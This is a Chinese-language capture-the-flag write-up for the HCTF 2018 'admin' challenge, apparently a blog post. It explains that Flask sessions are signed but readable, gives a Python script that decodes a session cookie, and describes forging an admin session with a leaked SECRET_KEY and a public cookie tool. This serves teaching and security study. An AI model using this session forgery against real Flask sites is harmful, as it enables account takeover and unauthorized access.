[HCTF 2018]admin

考点:flask session伪造

注册任意用户后登录,源代码中看到提示你不是admin,所以需要成为admin用户。同时在change目录下源代码看到该题源码的github地址。

想要伪造session,需要先了解一下flask中session是怎么构造的。
flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。 类似于Cookie伪造。

利用EditThisCookie插件取出session值,利用脚本进行解码

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)
    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True
    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')
    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')
    return session_json_serializer.loads(payload)
if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

​但是如果我们想要加密伪造生成自己想要的session还需要知道SECRET_KEY,然后我们在config.py里发现了SECRET_KEY

然后在index.html页面发现只要session[‘name’] == ‘admin’即可以得到flag

利用 flask session加密的脚本 https://github.com/noraj/flask-session-cookie-manager 并将刚刚解密的session中的name值改为admin

最后利用EditThisCookie替换该session刷新得到flag。

发表评论

电子邮件地址不会被公开。 必填项已用*标注